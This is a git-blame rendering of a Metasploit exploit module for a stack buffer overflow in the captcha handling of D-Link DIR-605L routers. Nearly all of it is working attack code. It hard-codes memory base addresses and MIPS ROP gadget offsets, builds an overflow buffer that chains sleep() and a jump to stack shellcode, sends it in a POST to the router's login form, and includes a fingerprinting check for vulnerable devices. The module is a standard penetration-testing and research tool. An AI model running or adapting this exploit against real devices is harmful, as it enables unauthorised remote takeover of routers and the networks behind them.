2013-10-17 06:08:01 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-21 16:54:42 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2013-10-17 06:08:01 +00:00
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2013-10-18 03:43:47 +00:00
|
|
|
Rank = ManualRanking # Because only has been tested on a QEMU emulated environment
|
2013-10-17 06:08:01 +00:00
|
|
|
|
|
|
|
HttpFingerprint = { :pattern => [ /Boa/ ] }
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'D-Link DIR-605L Captcha Handling Buffer Overflow',
|
|
|
|
'Description' => %q{
|
2013-10-28 19:00:19 +00:00
|
|
|
This module exploits an anonymous remote code execution vulnerability on D-Link DIR-605L routers. The
|
2013-10-17 06:08:01 +00:00
|
|
|
vulnerability exists while handling user supplied captcha information, and is due to the
|
|
|
|
insecure usage of sprintf on the getAuthCode() function. This module has been tested
|
2015-10-12 22:09:45 +00:00
|
|
|
successfully on D-Link DIR-605L firmware 1.13 (emulated) and firmware 1.12 (real).
|
2013-10-17 06:08:01 +00:00
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Craig Heffner', # Vulnerability discovery, original exploit
|
|
|
|
'juan vazquez' # Metasploit module
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'DisableNops' => true,
|
|
|
|
'Space' => 3000,
|
|
|
|
'BadChars' => "\x00\x67\x26\x2b"
|
|
|
|
},
|
|
|
|
'Platform' => ['linux'],
|
|
|
|
'Arch' => ARCH_MIPSBE,
|
|
|
|
'References' =>
|
|
|
|
[
|
2016-07-15 17:00:31 +00:00
|
|
|
[ 'OSVDB', '86824' ],
|
2013-10-17 06:08:01 +00:00
|
|
|
[ 'URL', 'http://www.devttys0.com/2012/10/exploiting-a-mips-stack-overflow/' ]
|
|
|
|
],
|
|
|
|
'Targets' =>
|
|
|
|
[
|
2015-10-12 22:12:01 +00:00
|
|
|
[ 'D-Link DIR-605L 1.13', # Works on 1.12 as well
|
2013-10-17 06:08:01 +00:00
|
|
|
{
|
|
|
|
'Offset' => 94,
|
2013-10-18 03:34:54 +00:00
|
|
|
'LibcBase' => 0x2ab86000, # According to Original Exploit by Craig Heffner
|
|
|
|
'ApmibBase' => 0x2aaef000, # According to Original Exploit by Craig Heffner
|
|
|
|
#'LibcBase' => 0x4212e000, # QEMU environment
|
|
|
|
#'ApmibBase' => 0x42095000, # QEMU environment
|
2013-10-17 06:08:01 +00:00
|
|
|
#LOAD:000248D4 li $a0, 1 ; set $a0 for the sleep() call
|
|
|
|
#LOAD:000248D8 move $t9, $s1 ; $s1 is controlled after the overflow
|
|
|
|
#LOAD:000248DC jalr $t9
|
|
|
|
'Ret' => 0x248D4, # from libc
|
|
|
|
#LOAD:0002B954 move $t9, $s2 # Controlled
|
|
|
|
#LOAD:0002B958 lw $ra, 0x30+var_4($sp) # allows to get controlled $ra from the stack
|
|
|
|
#LOAD:0002B95C lw $s4, 0x30+var_8($sp)
|
|
|
|
#LOAD:0002B960 lw $s3, 0x30+var_C($sp)
|
|
|
|
#LOAD:0002B964 lw $s2, 0x30+var_10($sp)
|
|
|
|
#LOAD:0002B968 lw $s1, 0x30+var_14($sp) # allows to get controlled $s1 from the stack
|
|
|
|
#LOAD:0002B96C lw $s0, 0x30+var_18($sp)
|
|
|
|
#LOAD:0002B970 jr $t9
|
|
|
|
'RopJmpSleep' => 0x2B954, # from libc
|
|
|
|
'RopSleep' => 0x23D30, # from libc # Sleep Function Address # sleep() to flush the data cache
|
|
|
|
#LOAD:000027E8 move $t9, $s1 # Controlled
|
|
|
|
#LOAD:000027EC jalr $t9 ; sub_22D0
|
|
|
|
#LOAD:000027F0 addiu $a2, $sp, 0x40+var_24 ; put pointer to the stack on $a2 # executed because of pipelining
|
|
|
|
'RopPtrStack' => 0x027E8, # from apmi
|
|
|
|
#LOAD:00001D78 move $t9, $a2 ; $a2 contains a poiner to the stack
|
|
|
|
#LOAD:00001D7C jalr $t9
|
|
|
|
'RopJmpStack' => 0x01D78 # from apmi
|
|
|
|
}
|
|
|
|
]
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Oct 08 2012',
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def check
|
|
|
|
res = send_request_cgi({ 'uri' => '/comm.asp' })
|
|
|
|
if res and res.code == 200 and res.body =~ /var modelname="DIR-605L"/ and res.headers["Server"] and res.headers["Server"] =~ /Boa\/0\.94\.14rc21/
|
2014-01-22 17:20:10 +00:00
|
|
|
return Exploit::CheckCode::Appears
|
2013-10-17 06:08:01 +00:00
|
|
|
end
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
|
|
|
|
shellcode = ""
|
|
|
|
shellcode << rand_text(target['Offset']) # Padding
|
|
|
|
shellcode << rand_text(4) # $s0
|
|
|
|
shellcode << [target['LibcBase'] + target['RopJmpSleep']].pack("N") # $s1
|
|
|
|
shellcode << [target['LibcBase'] + target['RopSleep']].pack("N") # $s2
|
|
|
|
shellcode << rand_text(4) # $s3
|
|
|
|
shellcode << [target['LibcBase'] + target.ret].pack("N") # $ra
|
|
|
|
shellcode << rand_text(0x1c) # filler
|
|
|
|
shellcode << rand_text(4) # $s0
|
|
|
|
shellcode << [target['ApmibBase'] + target['RopJmpStack']].pack("N") # $s1
|
|
|
|
shellcode << rand_text(4) # $s2
|
|
|
|
shellcode << rand_text(4) # $s3
|
|
|
|
shellcode << rand_text(4) # $s4
|
|
|
|
shellcode << [target['ApmibBase'] + target['RopPtrStack']].pack("N") # $ra
|
|
|
|
shellcode << rand_text(0x1c) # filler
|
|
|
|
shellcode << payload.encoded # shellcode
|
|
|
|
|
2016-02-01 21:12:03 +00:00
|
|
|
print_status("Sending exploit...")
|
2013-10-17 06:08:01 +00:00
|
|
|
|
|
|
|
send_request_cgi({
|
|
|
|
'method' => 'POST',
|
|
|
|
'uri' => "/goform/formLogin",
|
|
|
|
'encode_params' => false,
|
|
|
|
'vars_post' => {
|
|
|
|
'VERIFICATION_CODE' => 'myvoiceismypassportverifyme',
|
|
|
|
'VER_CODE' => '1234',
|
|
|
|
'login_n' => 'admin',
|
|
|
|
'FILECODE' => shellcode,
|
|
|
|
'curTime' => '1348588030496',
|
|
|
|
'login_pass' => 'Zm9vb255b3UA',
|
|
|
|
'login_name' => 'admin'
|
|
|
|
}
|
|
|
|
})
|
|
|
|
|
|
|
|
end
|
|
|
|
end
|